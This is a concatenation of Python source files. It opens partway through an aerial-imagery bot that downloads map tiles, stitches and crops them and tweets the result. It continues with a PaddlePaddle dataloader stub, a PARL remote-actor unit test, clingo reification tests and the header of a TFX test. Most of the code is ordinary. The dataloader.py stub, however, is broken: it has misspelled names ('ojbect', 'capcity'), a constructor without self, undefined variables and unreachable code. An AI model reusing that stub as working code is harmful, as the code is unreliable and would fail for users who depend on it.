if c.status == MapTileStatus.ERROR:
all_good = False
break
return all_good
def download(self):
"""
Downloads the constitudent tiles using a threadpool for performance
while updating the progress indicator.
"""
# set up progress indicator
prog = ProgressIndicator(self)
prog_thread = threading.Thread(target=prog.loop)
prog_thread.start()
# shuffle the download order of the tiles, this serves no actual purpose
# but it makes the progress indicator look really cool!
tiles = self.flat()
random.shuffle(tiles)
# download tiles using threadpool (2-10 times faster than
# [maptile.load() for maptile in self.flat()]), see
# https://docs.python.org/dev/library/concurrent.futures.html#threadpoolexecutor-example
threads = max(self.width, self.height)
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
{executor.submit(maptile.load): maptile for maptile in tiles}
# retry failed downloads if fewer than 2% of tiles are missing (happens
# frequently when pulling from naver map)
missing_tiles = [maptile for maptile in self.flat() if maptile.status == MapTileStatus.ERROR]
if 0 < len(missing_tiles) < 0.02 * len(self.flat()):
if VERBOSITY != "quiet":
print("Retrying missing tiles...")
for maptile in missing_tiles:
maptile.load()
# finish up progress indicator
prog_thread.join()
prog.cleanup()
# check if we've got everything now
missing_tiles = [maptile for maptile in self.flat() if maptile.status == MapTileStatus.ERROR]
if missing_tiles:
raise RuntimeError(f"unable to load one or more map tiles: {missing_tiles}")
def stitch(self):
"""
Stitches the tiles together. Must not be called before all tiles have
been loaded.
"""
image = Image.new('RGB', (self.width * TILE_SIZE, self.height * TILE_SIZE))
for x in range(0, self.width):
for y in range(0, self.height):
image.paste(self.maptiles[x][y].image, (x * TILE_SIZE, y * TILE_SIZE))
self.image = image
class MapTileImage:
"""Image cropping, resizing and enhancement."""
def __init__(self, image):
self.image = image
def save(self, path, quality=90):
self.image.save(path, quality=quality)
def crop(self, zoom, georect):
"""
Crops the image such that it really only covers the area within the
input GeoRect. This function must only be called once per image.
"""
sw_x, sw_y = WebMercator.project(georect.sw, zoom)
ne_x, ne_y = WebMercator.project(georect.ne, zoom)
# determine what we'll cut off
sw_x_crop = round(TILE_SIZE * (sw_x % 1))
sw_y_crop = round(TILE_SIZE * (1 - sw_y % 1))
ne_x_crop = round(TILE_SIZE * (1 - ne_x % 1))
ne_y_crop = round(TILE_SIZE * (ne_y % 1))
# left, top, right, bottom
crop = (sw_x_crop, ne_y_crop, ne_x_crop, sw_y_crop)
# snip snap
self.image = ImageOps.crop(self.image, crop)
def scale(self, width, height):
"""
Scales an image. This can distort the image if width and height don't
match the original aspect ratio.
"""
# Image.LANCZOS apparently provides the best quality, see
# https://pillow.readthedocs.io/en/latest/handbook/concepts.html#concept-filters
self.image = self.image.resize((round(width), round(height)), resample=Image.LANCZOS)
def enhance(self):
"""Slightly increases contrast and brightness."""
# these values seem to work well for most images – a more adaptive
# method would but nice, but it's not a priority
contrast = 1.07
brightness = 1.01
self.image = ImageEnhance.Contrast(self.image).enhance(contrast)
self.image = ImageEnhance.Brightness(self.image).enhance(brightness)
class Log:
"""
A simplifying wrapper around the parts of the logging module that are
relevant here, plus some minor extensions. Goal: Logging of warnings
(depending on verbosity level), errors and exceptions on stderr, other
messages (modulo verbosity) on stdout, and everything (independent of
verbosity) in a logfile.
"""
def __init__(self, logfile):
# name and initialize logger
self.logger = logging.getLogger(__name__)
self.logger.setLevel(logging.DEBUG)
# via https://stackoverflow.com/a/36338212
class LevelFilter(logging.Filter):
def __init__(self, low, high):
self.low = low
self.high = high
logging.Filter.__init__(self)
def filter(self, record):
return self.low <= record.levelno <= self.high
# log errors (and warnings if a higher verbosity level is dialed in) on
# stderr
eh = logging.StreamHandler()
if VERBOSITY == "quiet":
eh.setLevel(logging.ERROR)
else:
eh.setLevel(logging.WARNING)
eh.addFilter(LevelFilter(logging.WARNING, logging.CRITICAL))
stream_formatter = logging.Formatter('%(message)s')
eh.setFormatter(stream_formatter)
self.logger.addHandler(eh)
# log other messages on stdout if verbosity not set to quiet
if VERBOSITY != "quiet":
oh = logging.StreamHandler(stream=sys.stdout)
if VERBOSITY == "deafening":
oh.setLevel(logging.DEBUG)
elif VERBOSITY == "verbose" or VERBOSITY == "normal":
oh.setLevel(logging.INFO)
oh.addFilter(LevelFilter(logging.DEBUG, logging.INFO))
stream_formatter = logging.Formatter('%(message)s')
oh.setFormatter(stream_formatter)
self.logger.addHandler(oh)
# log everything to file independent of verbosity
if logfile is not None:
fh = logging.FileHandler(logfile)
fh.setLevel(logging.DEBUG)
file_formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%dT%H:%M:%S')
fh.setFormatter(file_formatter)
self.logger.addHandler(fh)
def debug(self, s): self.logger.debug(s)
def info(self, s): self.logger.info(s)
def warning(self, s): self.logger.warning(s)
def error(self, s): self.logger.error(s)
def critical(self, s): self.logger.critical(s)
def exception(self, e):
"""
Logging of game-breaking exceptions, based on:
https://stackoverflow.com/a/40428650
"""
e_traceback = traceback.format_exception(e.__class__, e, e.__traceback__)
traceback_lines = []
for line in [line.rstrip('\n') for line in e_traceback]:
traceback_lines.extend(line.splitlines())
for line in traceback_lines:
self.critical(line)
sys.exit(1)
class Tweeter:
"""Basic class for tweeting images, a simple wrapper around tweepy."""
def __init__(self, consumer_key, consumer_secret, access_token, access_token_secret):
# for references, see:
# http://docs.tweepy.org/en/latest/api.html#status-methods
# https://developer.twitter.com/en/docs/tweets/post-and-engage/guides/post-tweet-geo-guide
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
self.api = tweepy.API(auth)
def get_location(self, geopoint):
full_name = ""
country = ""
try:
location = self.api.reverse_geocode(geopoint.lat, geopoint.lon)
if location:
full_name = location[0].full_name
country = location[0].country
except KeyError:
# can apparently sometimes occur if twitter doesn't have geodata
# for the selected location
pass
return (full_name, country)
def upload(self, path):
"""Uploads an image to Twitter."""
return self.api.media_upload(path)
def tweet(self, text, media, geopoint=None):
if geopoint:
self.api.update_status(
text,
media_ids=[media.media_id],
lat=geopoint.lat,
long=geopoint.lon,
display_coordinates=True
)
else:
self.api.update_status(text, media_ids=[media.media_id])
def main():
global VERBOSITY
global LOGGER
# handle potential cli arguments
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--help', action='help', default=argparse.SUPPRESS, help=argparse._('show this help message and exit')) # override default help argument so that only --help (and not -h) can call
parser.add_argument('config_path', metavar='CONFIG_PATH', type=str, nargs='?', default="config.ini", help='config file to use instead of looking for config.ini in the current working directory')
parser.add_argument('-p', '--point', dest='point', metavar='LAT,LON', type=str, help='a point, e.g. \'37.453896,126.446829\', that will override your configuration (if its latitide is negative, option parsing might throw an error – simply write -p="LAT,LON" in that case)') # https://stackoverflow.com/questions/16174992/cant-get-argparse-to-read-quoted-string-with-dashes-in-it
parser.add_argument('-m', '--max-meters-per-pixel', dest='max_meters_per_pixel', metavar='N', type=float, help='a maximum meters per pixel constraint that will override your configuration')
parser.add_argument('-w', '--width', dest='width', metavar='N', type=float, help='width of the depicted area in meters, will override your configuration')
parser.add_argument('-h', '--height', dest='height', metavar='N', type=float, help='height of the depicted area in meters, will override your configuration')
parser.add_argument('--image_width', dest='image_width', metavar='N', type=float, help='width of the result image, will override your configuration (where you can also find an explanation of how this option interacts with the -m, -w, and -h options)')
parser.add_argument('--image_height', dest='image_height', metavar='N', type=float, help='height of the result image, will override your configuration (where you can also find an explanation of how this option interacts with the -m, -w, and -h options)')
args = parser.parse_args()
# load configuration either from config.ini or from a user-supplied file
# (the latter option is handy if you want to run multiple instances of
# ærialbot with different configurations)
config = ConfigObj(args.config_path, unrepr=True)
# first of all, set up logging at the correct verbosity (and make the
# verbosity available globally since it's needed for the progress indicator)
VERBOSITY = config['GENERAL']['verbosity']
logfile = config['GENERAL']['logfile']
LOGGER = Log(logfile)
############################################################################
# copy the configuration into variables for brevity
tile_path_template = config['GENERAL']['tile_path_template']
image_path_template = config['GENERAL']['image_path_template']
tile_url_template = config['GEOGRAPHY']['tile_url_template']
shapefile = config['GEOGRAPHY']['shapefile']
point = config['GEOGRAPHY']['point']
width = config['GEOGRAPHY']['width']
height = config['GEOGRAPHY']['height']
image_width = config['IMAGE']['image_width']
image_height = config['IMAGE']['image_height']
max_meters_per_pixel = config['IMAGE']['max_meters_per_pixel']
apply_adjustments = config['IMAGE']['apply_adjustments']
image_quality = config['IMAGE']['image_quality']
consumer_key = config['TWITTER']['consumer_key']
consumer_secret = config['TWITTER']['consumer_secret']
access_token = config['TWITTER']['access_token']
access_token_secret = config['TWITTER']['access_token_secret']
tweet_text = config['TWITTER']['tweet_text']
include_location_in_metadata = config['TWITTER']['include_location_in_metadata']
# override configured options with values supplied via the cli
if args.point:
point = tuple(map(float, args.point.split(",")))
if args.max_meters_per_pixel:
max_meters_per_pixel = args.max_meters_per_pixel
if args.width:
width = args.width
if args.height:
height = args.height
if args.image_width:
image_width = args.image_width
if args.image_height:
image_height = args.image_height
############################################################################
LOGGER.info("Processing configuration...")
# handle tile url special cases
if tile_url_template == "googlemaps":
tile_url_template = "https://khms2.google.com/kh/v={google_maps_version}?x={x}&y={y}&z={zoom}"
elif tile_url_template == "navermap":
tile_url_template = "https://map.pstatic.net/nrb/styles/satellite/{naver_map_version}/{zoom}/{x}/{y}.jpg?mt=bg"
if "{google_maps_version}" in tile_url_template:
LOGGER.info("Determining current Google Maps version and patching tile URL template...")
# automatic fallback: current as of July 2021, will likely continue
# to work for at least a while
google_maps_version = '904'
try:
google_maps_page = requests.get("https://maps.googleapis.com/maps/api/js", headers={"User-Agent": USER_AGENT}).content
match = re.search(rb"khms0\.googleapis\.com\/kh\?v=([0-9]+)", google_maps_page)
if match:
google_maps_version = match.group(1).decode('ascii')
LOGGER.debug(google_maps_version)
else:
LOGGER.warning(f"Unable to extract current version, proceeding with outdated version {google_maps_version} instead.")
except requests.RequestException as e:
LOGGER.warning(f"Unable to load Google Maps, proceeding with outdated version {google_maps_version} instead.")
tile_url_template = tile_url_template.replace("{google_maps_version}", google_maps_version)
if "{naver_map_version}" in tile_url_template:
LOGGER.info("Determining current Naver Map version and patching tile URL template...")
naver_map_version = requests.get("https://map.pstatic.net/nrb/styles/satellite.json", headers={'User-Agent': USER_AGENT}).json()["version"]
LOGGER.debug(naver_map_version)
tile_url_template = tile_url_template.replace("{naver_map_version}", naver_map_version)
MapTile.tile_path_template = tile_path_template
MapTile.tile_url_template = tile_url_template
# process max_meters_per_pixel setting
if image_width is None and image_height is None:
assert max_meters_per_pixel is not None
elif image_height is None:
max_meters_per_pixel = (max_meters_per_pixel or 1) * (width / image_width)
elif image_width is None:
max_meters_per_pixel = (max_meters_per_pixel or 1) * (height / image_height)
else:
# if both are set, effectively use whatever imposes a tighter constraint
if width / image_width <= height / image_height:
max_meters_per_pixel = (max_meters_per_pixel or 1) * (width / image_width)
else:
max_meters_per_pixel = (max_meters_per_pixel or 1) * (height / image_height)
# process image width and height for scaling
if image_width is not None or image_height is not None:
if image_height is None:
image_height = height * (image_width / width)
elif image_width is None:
image_width = width * (image_height / height)
# whether to enable or disable tweeting
tweeting = all(x is not None for x in [consumer_key, consumer_secret, access_token, access_token_secret])
############################################################################
if shapefile is None and point is None:
raise RuntimeError("neither shapefile path nor point configured")
elif point is None:
LOGGER.info("Loading shapefile...")
LOGGER.debug(shapefile)
shape = GeoShape(shapefile)
tries = 0
while True:
tries += 1
if tries > 10:
raise RuntimeError("too many retries – maybe there's no internet connection? either that, or your max_meters_per_pixel setting is too low")
if point is None:
LOGGER.info("Generating random point within shape...")
p = shape.random_geopoint()
else:
LOGGER.info("Using configured point instead of shapefile...")
p = GeoPoint(point[0], point[1])
LOGGER.debug(p)
LOGGER.info("Computing required tile zoom level at point...")
zoom = p.compute_zoom_level(max_meters_per_pixel)
LOGGER.debug(zoom)
LOGGER.info("Generating rectangle with your selected width and height around point...")
rect = GeoRect.around_geopoint(p, width, height)
LOGGER.debug(rect)
LOGGER.info("Turning rectangle into a grid of map tiles at the required zoom level...")
grid = MapTileGrid.from_georect(rect, zoom)
LOGGER.debug(grid)
# no need to do check quality if the point was set manually – clearly
# the user won't mind low-quality imagery
if point is not None:
break
LOGGER.info("Checking quality of imagery available for the map tile grid...")
if not grid.has_high_quality_imagery():
LOGGER.info("Not good enough, let's try this again...")
else:
LOGGER.info("Lookin' good, let's proceed!")
break
############################################################################
LOGGER.info("Downloading tiles...")
grid.download()
LOGGER.info("Stitching tiles together into an image...")
grid.stitch()
image = MapTileImage(grid.image)
LOGGER.info("Cropping image to match the chosen area width and height...")
LOGGER.debug((width, height))
image.crop(zoom, rect)
if image_width is not None or image_height is not None:
LOGGER.info("Scaling image...")
LOGGER.debug((image_width, image_height))
image.scale(image_width, image_height)
if apply_adjustments:
LOGGER.info("Enhancing image...")
image.enhance()
LOGGER.info("Saving image to disk...")
image_path = image_path_template.format(
datetime=datetime.today().strftime("%Y-%m-%dT%H.%M.%S"),
latitude=p.lat,
longitude=p.lon,
width=width,
height=height,
max_meters_per_pixel=max_meters_per_pixel,
xmin=grid.at(0, 0).x,
xmax=grid.at(0, 0).x+grid.width,
ymin=grid.at(0, 0).y,
ymax=grid.at(0, 0).y+grid.height,
zoom=zoom,
georect=f"sw{rect.sw.lat},{rect.sw.lon}ne{rect.ne.lat},{rect.ne.lon}"
)
LOGGER.debug(image_path)
d = os.path.dirname(image_path)
if not os.path.isdir(d):
os.makedirs(d)
image.save(image_path, image_quality)
############################################################################
if tweeting:
LOGGER.info("Connecting to Twitter...")
tweeter = Tweeter(consumer_key, consumer_secret, access_token, access_token_secret)
#if "location_full_name" in tweet_text or "location_country" in tweet_text:
LOGGER.info("Getting location information from Twitter...")
(location_full_name, location_country) = tweeter.get_location(p)
LOGGER.debug((location_full_name, location_country))
osm_url = f"https://www.openstreetmap.org/#map={zoom}/{p.lat}/{p.lon}"
googlemaps_url = f"https://www.google.com/maps/@{p.lat},{p.lon},{zoom}z"
LOGGER.info("Uploading image to Twitter...")
media = tweeter.upload(image_path)
LOGGER.info("Sending tweet...")
tweet_text = tweet_text.format(
latitude=p.lat,
longitude=p.lon,
point_fancy=p.fancy(),
osm_url=osm_url,
googlemaps_url=googlemaps_url,
location_full_name=location_full_name,
location_country=location_country
)
LOGGER.debug(tweet_text)
if include_location_in_metadata:
tweeter.tweet(tweet_text, media, p)
else:
tweeter.tweet(tweet_text, media)
LOGGER.info("All done!")
if __name__ == "__main__":
# log all exceptions
try:
main()
except Exception as e:
LOGGER.exception(e)
|
dataloader.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid as fluid
from fluid.reader import DataLoader
from ..utils import data_server
class Record(object):
def __init__(self):
self.record_no = -1
r.data = None
class DataLoader(ojbect):
def __init__(reader_cls,
file_list,
feed_list=None,
places=None,
return_list=False,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
"""
Reader_cls is the class name of dataset.See example in dataset.py
file_list is the input data file list and it should be get by loader.For example, all data
file is on local or on hdfs.
This class:
1. get data file list from the leader.
2. parse records from reader_cls' object.
3. if there's no data local, try to pull data from other dataserver or raise StopIteration.
"""
self._name = unique_name.generate("_dataloader_")
self._loader = DataLoader()
self._start_data_server()
# to control the cache size.
self._data_queue = Queue(capcity)
self._lock = Lock()
self._file_list = file_list
self._reader_cls = reader_cls
assert type(reader_cls) == DataReader
self._t_read_data = Thread(target=self._read_data)
self._t_read_data.start()
def _start_data_server(self):
"""
start and register the data server
"""
self._data_server = dataserver.DataServer()
pass
def __iter__(self):
"""
get data from queue
"""
pass
def __next__(self):
pass
def _get_one_data_file(self):
pass
def _get_data(self):
"""
get data from queue
"""
pass
def _get_file_key(self, idx, file_path):
return "idx:{}_path:{}".format(idx, file_path)
return key
def _read_data(self):
"""
read data into queue
"""
while True:
file_data_set = self._sub_data_set.get()
if file_data_set is None:
logger.info("terminated exit!")
break
rec_map = {}
for one_range in file_data_set.filtered_records:
for rec_no in range(one_range.begin, one_range.end + 1):
rec_map[rec.record_no] = one_range.status
for rec_no, data in enumerate(
self._reader_cls(file_data_set.file_path)):
if rec_no in rec_map and rec_map[
rec_no] == RecordStatus.PROCSSED:
continue
logger.debug("read rec_no:{} data_len:{}".format(rec_no,
len(data)))
self._data_queue.put(1, block=True)
key = self._get_file_key(file_data_set.idx_in_list,
file_data_set.file_path)
with self._lock:
if key not in self._data:
self._data[key] = {}
self._data[key][rec_no] = data
|
locate_remote_file_test_alone.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import shutil
import unittest
import parl
import os
import sys
import time
import threading
from six.moves import queue
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.remote.client import disconnect
from parl.remote import exceptions
from parl.utils import logger, get_free_tcp_port
class TestCluster(unittest.TestCase):
def tearDown(self):
disconnect()
def _write_remote_actor_to_file(self, file_path):
with open(file_path, 'w') as f:
f.write('''\
import parl
@parl.remote_class
class Actor(object):
def __init__(self):
pass
def add_one(self, x):
return x + 1
''')
def _gen_remote_class_in_absolute_path(self, file_name):
# E.g.: /A/B/C/test.py
cur_dir = os.getcwd() # /A/B/C
parent_dir = os.path.split(cur_dir)[0] # /A/B
# /A/B/parl_unittest_abs_dir
abs_dir = os.path.join(parent_dir,
"parl_unittest_abs_dir_{}".format(time.time()))
if os.path.exists(abs_dir):
logger.warning("removing directory: {}".format(abs_dir))
shutil.rmtree(abs_dir)
os.mkdir(abs_dir)
file_path = os.path.join(abs_dir, file_name)
self._write_remote_actor_to_file(file_path)
logger.info("create file: {}".format(file_path))
return abs_dir
def _gen_remote_class_in_relative_path(self, file_name):
relative_dir = "../parl_unittest_relative_dir_{}".format(time.time())
if os.path.exists(relative_dir):
logger.warning("removing directory: {}".format(relative_dir))
shutil.rmtree(relative_dir)
os.mkdir(relative_dir)
file_path = os.path.join(relative_dir, file_name)
self._write_remote_actor_to_file(file_path)
logger.info("create file: {}".format(file_path))
return relative_dir
def test_locate_remote_file_with_absolute_env_path(self):
port = get_free_tcp_port()
master = Master(port=port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 1)
for _ in range(3):
if master.cpu_num == 1:
break
time.sleep(10)
self.assertEqual(1, master.cpu_num)
parl.connect('localhost:{}'.format(port))
abs_dir = self._gen_remote_class_in_absolute_path("abs_actor.py")
sys.path.append(abs_dir) # add absolute environment path
import abs_actor
actor = abs_actor.Actor()
self.assertEqual(actor.add_one(1), 2)
shutil.rmtree(abs_dir)
sys.path.remove(abs_dir)
master.exit()
worker1.exit()
def test_locate_remote_file_with_absolute_env_path_in_multi_threads(self):
port = get_free_tcp_port()
master = Master(port=port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 10)
for _ in range(3):
if master.cpu_num == 10:
break
time.sleep(10)
self.assertEqual(10, master.cpu_num)
parl.connect('localhost:{}'.format(port))
abs_dir = self._gen_remote_class_in_absolute_path("abs_actor2.py")
sys.path.append(abs_dir) # add absolute environment path
import abs_actor2
def run(q):
try:
actor = abs_actor2.Actor()
self.assertEqual(actor.add_one(1), 2)
except Exception as e:
q.put(False)
raise e
q.put(True)
result = queue.Queue()
threads = []
for _ in range(10):
th = threading.Thread(target=run, args=(result, ))
th.start()
threads.append(th)
for th in threads:
th.join()
no_exception = result.get()
assert no_exception
shutil.rmtree(abs_dir)
sys.path.remove(abs_dir)
master.exit()
worker1.exit()
def test_locate_remote_file_with_relative_env_path_without_distributing_files(
self):
port = get_free_tcp_port()
master = Master(port=port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 1)
for _ in range(3):
if master.cpu_num == 1:
break
time.sleep(10)
self.assertEqual(1, master.cpu_num)
relative_dir = self._gen_remote_class_in_relative_path(
"relative_actor1.py")
parl.connect('localhost:{}'.format(port))
sys.path.append(relative_dir) # add relative environment path
import relative_actor1
with self.assertRaises(exceptions.RemoteError):
actor = relative_actor1.Actor()
shutil.rmtree(relative_dir)
sys.path.remove(relative_dir)
master.exit()
worker1.exit()
def test_locate_remote_file_with_relative_env_path_with_distributing_files(
self):
port = get_free_tcp_port()
master = Master(port=port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 1)
for _ in range(3):
if master.cpu_num == 1:
break
time.sleep(10)
self.assertEqual(1, master.cpu_num)
relative_dir = self._gen_remote_class_in_relative_path(
"relative_actor2.py")
parl.connect(
'localhost:{}'.format(port),
distributed_files=["{}/*".format(relative_dir)])
sys.path.append(relative_dir) # add relative environment path
import relative_actor2
actor = relative_actor2.Actor()
self.assertEqual(actor.add_one(1), 2)
shutil.rmtree(relative_dir)
sys.path.remove(relative_dir)
master.exit()
worker1.exit()
if __name__ == '__main__':
unittest.main()
|
test_reify.py
|
'''
Test cases for the reify module.
'''
import os
from tempfile import NamedTemporaryFile
from multiprocessing import Process
from unittest import TestCase
from typing import Any, Callable, Dict, Set, Union, cast
from clingo.control import Control
from clingo.symbolic_atoms import SymbolicAtom
from clingo.symbol import Function, Number, Symbol
from clingo.application import Application, clingo_main
from clingo.theory_atoms import TheoryTermType
from ..reify import Reifier, ReifiedTheory, ReifiedTheoryTerm, reify_program
from ..theory import evaluate, is_clingo_operator, is_operator
GRAMMAR = """
#theory theory {
term { + : 6, binary, left;
<? : 5, binary, left;
< : 4, unary };
&tel/0 : term, any;
&tel2/0 : term, {=}, term, head
}.
"""
THEORY = """
#theory theory {
t { + : 0, binary, left;
- : 0, unary };
&a/0 : t, {=}, t, head;
&b/0 : t, directive
}.
"""
class _Application(Application):
def __init__(self, main):
self._main = main
def main(self, control, files):
self._main(control) # nocoverage
class _AppMain:
def __init__(self, prg: str):
self._prg = prg
def __call__(self, ctl: Control):
ctl.add('base', [], self._prg) # nocoverage
ctl.ground([('base', [])]) # nocoverage
ctl.solve() # nocoverage
def _reify(prg, calculate_sccs: bool = False, reify_steps: bool = False):
if isinstance(prg, str):
symbols = reify_program(prg, calculate_sccs, reify_steps)
else:
ctl = Control()
symbols = []
reifier = Reifier(symbols.append, calculate_sccs, reify_steps)
ctl.register_observer(reifier)
prg(ctl)
return [str(sym) for sym in symbols]
def _reify_check(prg: Union[str, Callable[[Control], None]], calculate_sccs: bool = False, reify_steps: bool = False):
with NamedTemporaryFile(delete=False) as temp_out:
name_out = temp_out.name
try:
fd_stdout = os.dup(1)
fd_out = os.open(name_out, os.O_WRONLY)
os.dup2(fd_out, 1)
os.close(fd_out)
args = ["--output=reify", "-Wnone"]
if calculate_sccs:
args.append('--reify-sccs')
if reify_steps:
args.append('--reify-steps')
if isinstance(prg, str):
app_main = _AppMain(prg)
else:
app_main = cast(Any, prg)
proc = Process(target=clingo_main, args=(_Application(app_main), args))
proc.start()
proc.join()
os.fsync(1)
os.dup2(fd_stdout, 1)
os.close(fd_stdout)
with open(name_out, encoding="utf8") as file_out:
return [s.rstrip('.\n') for s in file_out]
finally:
os.unlink(name_out)
def term_symbols(term: ReifiedTheoryTerm, ret: Dict[int, Symbol]) -> None:
'''
Represent arguments to theory operators using clingo's `clingo.Symbol`
class.
Theory terms are evaluated using `clingox.theory.evaluate_unary` and added
to the given dictionary using the index of the theory term as key.
'''
if term.type == TheoryTermType.Function and is_operator(term.name) and not is_clingo_operator(term.name):
term_symbols(term.arguments[0], ret)
term_symbols(term.arguments[1], ret)
elif term.index not in ret:
ret[term.index] = evaluate(term)
def visit_terms(thy: ReifiedTheory, cb: Callable[[ReifiedTheoryTerm], None]):
'''
Visit the terms occuring in the theory atoms of the given theory.
This function does not recurse into terms.
'''
for atm in thy:
for elem in atm.elements:
for term in elem.terms:
cb(term)
cb(atm.term)
guard = atm.guard
if guard:
cb(guard[1])
def _assume(ctl: Control):
ctl.add("base", [], '{a;b}.')
ctl.ground([('base', [])])
lit_a = cast(SymbolicAtom, ctl.symbolic_atoms[Function("a")]).literal
lit_b = cast(SymbolicAtom, ctl.symbolic_atoms[Function("b")]).literal
ctl.solve(assumptions=[lit_a, lit_b])
ctl.solve(assumptions=[-lit_a, -lit_b])
def _incremental(ctl: Control):
ctl.add('step0', [], 'a :- b. b :- a. {a;b}.')
ctl.ground([('step0', [])])
ctl.solve()
ctl.add('step1', [], 'c :- d. d :- c. {c;d}.')
ctl.ground([('step1', [])])
ctl.solve()
class TestReifier(TestCase):
'''
Tests for the Reifier.
'''
def test_incremental(self):
'''
Test incremental reification.
'''
# Note: we use sets here because the reification of sccs does not
# exactly follow what clingo does. In priniciple, it would be possible
# to implement this in the same fashion clingo does.
self.assertSetEqual(set(_reify(_incremental, True, True)),
set(_reify_check(_incremental, True, True)))
def test_reify(self):
'''
Test reification of different language elements.
'''
prgs = [
_assume,
GRAMMAR + '&tel { a <? b: x}. { x }.',
GRAMMAR + '&tel { a("s") <? b({2,3}) }.',
GRAMMAR + '&tel { a <? b([2,c(1)]) }.',
GRAMMAR + '&tel { a(s) <? b((2,3)) }.',
GRAMMAR + '&tel2 { a <? b } = c.',
'a :- b. b :- a. c :- d. {a; d}.',
'{ a(1); a(2) } 2. :- a(1..2).',
':- not b. {b}.',
'{ a(1..4) }. :- #count{ X: a(X) } > 2.',
'a(1..2). #show b(X): a(X).',
'1{ a(1..2) }. #minimize { X@2: a(X) }.',
'{ a(1..2)}. #show c: a(_). #show.',
'#external a. [true]',
'#external a. [false]',
'#external a. [free]',
'#heuristic a. [1,true] {a}.',
'#project c: a. { a; b; c }. #project b: a.',
'#edge (a,b): c. {c}.'
]
for prg in prgs:
self.assertListEqual(_reify(prg), _reify_check(prg))
self.assertListEqual(_reify(prg, reify_steps=True), _reify_check(prg, reify_steps=True))
self.assertListEqual(_reify(prg, calculate_sccs=True), _reify_check(prg, calculate_sccs=True))
def test_theory(self):
'''
Test the reified theory class.
'''
def get_theory(prg):
symbols = reify_program(prg)
thy = ReifiedTheory(symbols)
return list(thy)
atm1 = get_theory(THEORY + '&a { f(1+ -2): x } = z. { x }.')[0]
atm2 = get_theory(THEORY + '&a { f((1,2)): x }. { x }.')[0]
atm3 = get_theory(THEORY + '&a { f([1,2]): x }. { x }.')[0]
atm4 = get_theory(THEORY + '&a { f({1,2}): x }. { x }.')[0]
atm5 = get_theory(THEORY + '&a. { x }.')[0]
self.assertEqual(str(atm1), '&a { f((1)+(-(2))): literal_tuple(1) } = z')
self.assertEqual(str(atm2), '&a { f((1,2)): literal_tuple(1) }')
self.assertEqual(str(atm3), '&a { f([1,2]): literal_tuple(1) }')
self.assertEqual(str(atm4), '&a { f({1,2}): literal_tuple(1) }')
self.assertEqual(str(atm5), '&a')
self.assertEqual(evaluate(atm1.elements[0].terms[0]), Function('f', [Number(-1)]))
self.assertGreaterEqual(atm1.literal, 1)
dir1 = get_theory(THEORY + '&b.')[0]
self.assertEqual(dir1.literal, 0)
atms = get_theory(THEORY + '&a { 1 }. &a { 2 }. &a { 3 }.')
self.assertEqual(len(set(atms)), 3)
self.assertNotEqual(atms[0], atms[1])
self.assertNotEqual(atms[0] < atms[1],
atms[0] > atms[1])
aele = get_theory(THEORY + '&a { 1; 2; 3 }.')[0]
self.assertEqual(len(set(aele.elements)), 3)
self.assertNotEqual(aele.elements[0], aele.elements[1])
self.assertNotEqual(aele.elements[0] < aele.elements[1],
aele.elements[0] > aele.elements[1])
atup = get_theory(THEORY + '&a { 1,2,3 }.')[0]
self.assertEqual(len(set(atup.elements[0].terms)), 3)
self.assertNotEqual(atup.elements[0].terms[0], atup.elements[0].terms[1])
self.assertNotEqual(atup.elements[0].terms[0] < atup.elements[0].terms[1],
atup.elements[0].terms[0] > atup.elements[0].terms[1])
def test_theory_symbols(self):
"""
Test function to get symbols in a theory.
"""
def theory_symbols(prg: str) -> Set[str]:
ret: Dict[int, Symbol] = {}
visit_terms(ReifiedTheory(reify_program(prg)),
lambda term: term_symbols(term, ret))
return set(str(x) for x in ret.values())
prg = GRAMMAR + '&tel { a(s) <? b((2,3)) }.'
self.assertSetEqual(theory_symbols(prg),
set(['a(s)', 'b((2,3))', 'tel']))
prg = GRAMMAR + '&tel2 { (a("s") <? 2+3) <? b((2,3)) } = z.'
self.assertSetEqual(theory_symbols(prg),
set(['5', 'a("s")', 'z', 'tel2', 'b((2,3))']))
prg = GRAMMAR + '&tel{ a({b,c}) <? c}.'
self.assertRaises(RuntimeError, theory_symbols, prg)
|
pipeline_ops_test.py
|
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.orchestration.experimental.core.pipeline_ops."""
import copy
import os
import threading
import time
from absl.testing import parameterized
